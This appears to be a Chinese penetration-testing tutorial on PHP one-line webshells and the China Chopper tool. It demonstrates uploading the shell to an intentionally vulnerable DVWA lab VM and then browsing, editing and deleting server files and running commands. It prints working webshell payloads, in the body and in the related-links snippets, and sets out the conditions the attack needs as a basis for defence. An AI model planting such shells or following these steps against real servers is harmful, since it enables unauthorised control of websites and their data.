您当前的位置:首页 > 电脑百科 > 安全防护 > 数据安全

Web渗透测试——一句话木马与中国菜刀

时间:2020-08-11 11:23:49  来源:  作者:

一句话木马是Webshell的一种,那什么是Webshell?先讲讲什么是shell。Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。因为系统内核是我们不能直接操作的,shell就给我们提供了一个接口,通过shell我们可以把命令送入到内核。shell管理用户与操作系统之间的交互,等待你输入,向操作系统解释你的输入,并且处理各种各样的操作系统的输出结果。

Web渗透测试——一句话木马与中国菜刀

php一句话木马

网络安全行业有一句非常有名的谚语:“一个不想获得目标站点Webshell的黑客不是一个好的黑客”,可见Webshell对一个黑客的吸引是多么的强烈, 黑客在入侵了一个网站后,通常会留下一个asp或php后门文件与网站web服务器进行交互,得到一个命令执行环境,以达到控制网站服务器的目的。这个后门文件就是所谓的webshell。

一句话木马

一句话木马作为Webshell的一种,由于这类Webshell代码比较少,往往只有一行代码,所以就被称为一句话木马。一句话木马虽然代码简单,但是结合中国菜刀等Webshell管理工具,它们的功能却是非常的强大。

一句话木马举例

下面就是一个简单的PHP语言一句话木马:

<?php eval($_POST['cmd']);?>

eval函数

把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。

$_POST

PHP 超全局变量 ,$_POST 用于收集表单数据(form-data)。一句话木马会把我们通过POST方式提交的符合php代码规范的字符串当做php代码执行。

中国菜刀

这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,中国菜刀用途十分广泛,支持多种语言,小巧实用,中国菜刀有三个主要功能。

文件管理

可以访问站点所在服务器里边存储的文件,甚至可以删除、上传、下载里边的文件。

Web渗透测试——一句话木马与中国菜刀

文件管理

虚拟终端

可以在以下命令框中执行命令,获取服务器相关信息。

Web渗透测试——一句话木马与中国菜刀

虚拟终端

数据库管理

如果服务器上安装有数据库可以通过SQL语句查询数据库里边的数据。

Web渗透测试——一句话木马与中国菜刀

数据库管理

下面我就演示一下如何利用一句话木马和中国菜刀来获取目标站点Webshell,首先是测试环境我们使用DVWA,我们这次选择使用虚拟机中的OWASPBWA的DVWA,打开虚拟机中的OWASPBWA运行到如下图所示:

Web渗透测试——一句话木马与中国菜刀

OWASPBWA

注意图中红框中的信息,一是:http://192.168.199.131,二是:username=root,password=owaspbwa,根据提示输入用户名root,密码owaspbwa,进入OWASPBWA虚拟机中,打开主机浏览器输入网址http://192.168.199.131,进入OWASPBWA主界面,点击图中下方红框中的链接,如下图所示:

Web渗透测试——一句话木马与中国菜刀

OWASPBWA主界面

进入到DVWA登录界面,输入username=admin,password=admin,进入DVWA,如下图所示:

Web渗透测试——一句话木马与中国菜刀

DVWA登录界面

登录DVWA后,点击左侧“upload”-浏览选择文件-点击“upload”按钮-提示“../../hackable/uploads/123.php succesfully uploaded!”表示上传成功,如下图所示,注意下图左下角“Security Level: low”,否则上传不会成功。

Web渗透测试——一句话木马与中国菜刀

上传123.php一句话木马

然后打开中国菜刀,在空白处右键选择“添加”,出现添加SHELL窗口,在地址栏填入http://192.168.199.131/dvwa/hackable/uploads/123.php,后边小输入栏填入“cmd”,就是一句话木马中<?php eval($_POST['cmd']);?>中的POST参数,脚本类型选择PHP(Eval),字符编码为GB2312,点击添加。

Web渗透测试——一句话木马与中国菜刀

添加shell

双击添加好的shell就可以访问目标主机OWASPBWA中的文件,你可以删除、编辑及下载里边的文件,甚至可以上传“大马”到目标主机,获得更多的权限,如下图所示:

Web渗透测试——一句话木马与中国菜刀

访问目标主机文件

从以上的利用过程我们可以看出,使用中国菜刀通过一句话木马获取目标主机管理权限,需要三个必要条件,一是必须把一句话木马上传到目标主机,二是必须知道上传路径,三是上传路径有可执行权限,三者缺一不可,我们可以根据这三个必要条件制定如何防范类似攻击的方案。

以上就是今天介绍的一句话木马及中国菜刀,以及如何利用一句话木马和中国菜刀获取目标主机的管理权限,但是现在的网站服务器在上传过程中大部分都过滤了一句话木马,使得一句话木马无法轻易上传到目标服务器,接下来我会分享一些一句话木马的变形,感兴趣的可以加个关注@科技兴了解更多科技,尤其是网络安全方面的知识和咨询。



Tags:一句话木马   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
一句话木马是Webshell的一种,那什么是Webshell?先讲讲什么是shell。Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执...【详细内容】
2020-08-11  Tags: 一句话木马  点击:(383)  评论:(0)  加入收藏
<?php @eval($_POST[value]);?>php语言无需编译,动态执行,我们不得不佩服它的开发效率。但正因为可以动态执行,才带来了类似一句话木马等安全问题。因为我们要十分警惕,否则,无论...【详细内容】
2019-12-04  Tags: 一句话木马  点击:(171)  评论:(0)  加入收藏
一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:<?php @eval($_GET["code"])?><?php @system($_POST["cmd"])?>二、编码的替换的类型:<?php @fputs(fope...【详细内容】
2019-10-12  Tags: 一句话木马  点击:(183)  评论:(0)  加入收藏
▌简易百科推荐
众所周知,Windows系统流氓软件众多,其中不乏出身大厂的产品。这些带有流氓性质的软件,很多都会偷偷扫描系统数据,读取用户文件,造成电脑卡顿拖慢不说,还严重侵害了个人隐私,造成巨...【详细内容】
2021-12-06  趣玩APPS    Tags:流氓软件   点击:(16)  评论:(0)  加入收藏
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  IT野涵    Tags:sql注入   点击:(21)  评论:(0)  加入收藏
互联网时代,不论是个人还是组织,都将数据视为一项重要的资产。为了便于存储、管理,企业常常会为各项数据建立一个数据库,如果没有做好安全风险防护,一旦数据库被攻占,企业将迎来很...【详细内容】
2021-10-28  快快网络   企鹅号  Tags:数据库   点击:(50)  评论:(0)  加入收藏
前言(可能思路狭隘,有缺有错,师傅们多带带)【查看资料】Author: 0ne本篇文章数据来源于18+省市级别HVV,90+单位失陷报告。(一部分是笔者的参与,一部分是薅的公司其他师傅的报告...【详细内容】
2021-10-28  IT野涵    Tags:缺口   点击:(46)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19    博客园  Tags:SQL注入   点击:(51)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  woaker    Tags:SQL注入漏洞   点击:(65)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  合天网安实验室    Tags:sql注入   点击:(59)  评论:(0)  加入收藏
“放纵自己的欲望是最大的祸害,窥探别人的隐私是最大的罪恶,不知自己的过失是最大的病痛”。 上文咱们知道了目前互联网的数据安全存在隐患,数据安全的问题,每天都在发生,只不过...【详细内容】
2021-08-13  小陶子矿工    Tags:IPFS   点击:(79)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  IT影子    Tags:sql注入   点击:(63)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  李志宽    Tags:SQL注入   点击:(74)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条